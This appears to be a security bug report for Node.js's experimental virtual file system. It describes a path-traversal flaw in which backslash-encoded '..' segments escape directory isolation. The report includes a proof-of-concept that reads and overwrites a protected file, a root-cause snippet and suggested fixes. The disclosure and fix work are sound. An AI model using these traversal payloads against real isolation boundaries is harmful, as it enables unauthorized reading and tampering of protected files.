Environment
- Node.js: v27.0.0-nightly20260625c5635b82c9
- Flag: --experimental-vfs
- OS: Linux
Description
MemoryProvider#normalizePath() in lib/internal/vfs/providers/memory.js converts backslashes to forward slashes before calling pathPosix.normalize(). This allows .. traversal via backslash-encoded paths, bypassing directory isolation within the VFS virtual tree.
Root cause (lib/internal/vfs/providers/memory.js):
```js
let normalized = StringPrototypeReplaceAll(path, '\\', '/');
return pathPosix.normalize(normalized); // resolves .. after backslash→/ conversion
```
Reproducer
```js
// node --experimental-vfs poc.js
const vfs = require('node:vfs');
const fs = vfs.create(new vfs.MemoryProvider());
fs.mkdirSync('/admin');
fs.writeFileSync('/admin/secret', 'CONFIDENTIAL');
fs.mkdirSync('/user/data', { recursive: true });
fs.writeFileSync('/user/data/public.txt', 'public');
// Read traversal: /user/data\..\..\admin/secret → /admin/secret
console.log(fs.readFileSync('/user/data\\..\\..\\admin/secret', 'utf8'));
// Output: CONFIDENTIAL
// Write traversal
fs.writeFileSync('/user/data\\..\\..\\admin/secret', 'OVERWRITTEN');
console.log(fs.readFileSync('/admin/secret', 'utf8'));
// Output: OVERWRITTEN
```
Expected behavior
Paths containing backslashes should either be rejected or treated as literal filename characters (as Linux does), not converted to path separators.
Suggested fix
Remove the backslash-to-slash conversion in #normalizePath(), or reject paths containing backslashes with an EINVAL error.
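The normalization described above next to the two suggested fixes, as an added example that is not part of the original report or of Node.js's own code. It uses only the public `path.posix` API on stock Node.js (no `--experimental-vfs`); the function names, the `isInside` prefix check and the sample path are assumptions made for illustration.

```javascript
// Added illustration, not Node.js source. All function names are hypothetical.
const { posix: pathPosix } = require('node:path');

// Behaviour described in the report: backslashes become separators first,
// so "\.." is later resolved as a parent-directory segment.
function normalizeVulnerable(p) {
  return pathPosix.normalize(p.replaceAll('\\', '/'));
}

// Suggested fix, option 1: no conversion. POSIX normalization then treats
// a backslash as an ordinary filename character, as Linux does.
function normalizeLiteral(p) {
  return pathPosix.normalize(p);
}

// Suggested fix, option 2: reject any path containing a backslash with EINVAL.
function normalizeStrict(p) {
  if (p.includes('\\')) {
    const err = new Error(`EINVAL: invalid argument, backslash in path '${p}'`);
    err.code = 'EINVAL';
    throw err;
  }
  return pathPosix.normalize(p);
}

// Hypothetical caller-side isolation check: is p at or below root?
function isInside(root, p) {
  return p === root || p.startsWith(root.endsWith('/') ? root : root + '/');
}

// Constructed sample: the same path shape as the reproducer.
const sample = '/user/data\\..\\..\\admin/secret';

function report() {
  return {
    rawLooksConfined: isInside('/user', sample),
    vulnerable: normalizeVulnerable(sample),
    vulnerableConfined: isInside('/user', normalizeVulnerable(sample)),
    literal: normalizeLiteral(sample),
    literalConfined: isInside('/user', normalizeLiteral(sample)),
  };
}

console.log(report());
```

The raw string passes a `/user` prefix check while the converted form resolves outside it, which is why a containment check has to run on the path after the provider's own normalization.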